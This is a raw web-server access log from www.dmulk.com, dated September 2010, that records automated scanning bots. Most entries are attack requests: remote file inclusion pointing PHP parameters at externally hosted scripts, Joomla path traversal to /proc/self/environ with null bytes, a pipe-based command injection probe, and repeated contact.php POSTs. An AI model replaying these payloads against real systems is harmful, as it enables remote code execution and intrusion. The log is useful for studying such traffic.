222.236.47.182 - - [02/Sep/2010:14:04:38 -0700] "GET /logs/access_080907.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:14:04:38 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:14:04:40 -0700] "GET /logs/access_090321.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.232 - - [02/Sep/2010:14:05:03 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:14:05:18 -0700] "GET /logs/access_080928.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:14:05:45 -0700] "GET /logs/access_090517.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:14:05:47 -0700] "POST /logs/access_090304.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:14:05:48 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:14:05:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:14:06:05 -0700] "GET /logs/access_090517.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.45.183.226 - - [02/Sep/2010:14:06:13 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.831" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:33 -0700] "POST /logs/access_100526.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:34 -0700] "POST /logs/access_100526.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:34 -0700] "POST /logs/access_100526.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:35 -0700] "POST /logs/access_100526.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:36 -0700] "POST /logs/access_100526.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:39 -0700] "POST /logs/access_100526.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:40 -0700] "POST /logs/access_100526.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:46 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:47 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:47 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:14:06:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:07:32 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68604 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:07:33 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:07:38 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.183.226 - - [02/Sep/2010:14:09:02 -0700] "GET /logs/access_100824.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
207.45.183.226 - - [02/Sep/2010:14:09:03 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.831" "www.dmulk.com"
207.45.183.226 - - [02/Sep/2010:14:09:03 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:18 -0700] "GET /logs/access_100818.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:18 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:20 -0700] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:26 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:28 -0700] "GET /logs/access_100818.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:28 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:29 -0700] "GET /logs/access_100818.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:30 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:30 -0700] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:09:32 -0700] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:10:02 -0700] "GET /logs/access_100818.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:10:03 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:10:04 -0700] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:14:10:54 -0700] "GET /logs/access_100609.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:14:10:55 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:14:10:56 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:14:11:23 -0700] "GET /logs/access_090326.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/media/a/id1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:14:11:23 -0700] "GET /logs/access_090326.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:14:11:56 -0700] "GET /logs/access_100309.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/media/a/id1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:14:11:56 -0700] "GET /logs/access_100309.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:12:46 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:12:47 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:14:14:18 -0700] "POST /logs/access_090304.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:14:14:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:14:14:19 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
207.46.13.134 - - [02/Sep/2010:14:15:19 -0700] "GET /logs/access_080303.log HTTP/1.1" 200 1014709 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
94.181.132.99 - - [02/Sep/2010:14:15:39 -0700] "GET /logs/access_080912.log HTTP/1.0" 200 1769472 "http://www.dmulk.com/logs/access_080912.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:40 -0700] "GET /logs/access_080614.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:40 -0700] "GET /logs/access_080617.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:14:17:42 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:14:17:42 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:14:17:42 -0700] "GET /logs/access_080820.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:51 -0700] "GET /logs/access_080614.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:51 -0700] "GET /logs/access_080617.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:52 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:52 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:57 -0700] "GET /logs/access_080614.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:57 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:17:58 -0700] "GET /logs/access_080617.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.122.47 - - [02/Sep/2010:14:18:51 -0700] "GET ////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68602 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:19:21 -0700] "GET /logs/access_100818.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:19:22 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:19:25 -0700] "GET /logs/access_100625.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:19:25 -0700] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:19:31 -0700] "GET /logs/access_100818.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:19:32 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:19:35 -0700] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:14:19:54 -0700] "GET /logs/access_100609.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.42 - - [02/Sep/2010:14:19:55 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
74.55.39.186 - - [02/Sep/2010:14:19:56 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:14:19:56 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:20:31 -0700] "GET /logs/access_100515.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:14:20:34 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:20:36 -0700] "GET /logs/access_100515.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
110.45.146.84 - - [02/Sep/2010:14:20:41 -0700] "GET ////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68601 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:14:20:42 -0700] "GET /logs/access_080116.log HTTP/1.0" 200 601743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.100.181.217 - - [02/Sep/2010:14:21:00 -0700] "GET ////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68601 "-" "libwww-perl/5.79" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:21:10 -0700] "GET /logs/access_080614.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:21:10 -0700] "GET /logs/access_080617.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:21:11 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:21:12 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:21:17 -0700] "GET /logs/access_080614.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:14:21:17 -0700] "GET /logs/access_080617.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:14:21:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:14:21:22 -0700] "POST /logs/access_090902.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:14:21:22 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:21:38 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:21:54 -0700] "GET /logs/access_100515.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:14:22:04 -0700] "POST /logs/access_090304.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:22:08 -0700] "GET /logs/access_100515.log/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:14:22:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:14:22:15 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:14:22:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:22:23 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:14:22:23 -0700] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.28.136 - - [02/Sep/2010:14:22:30 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../.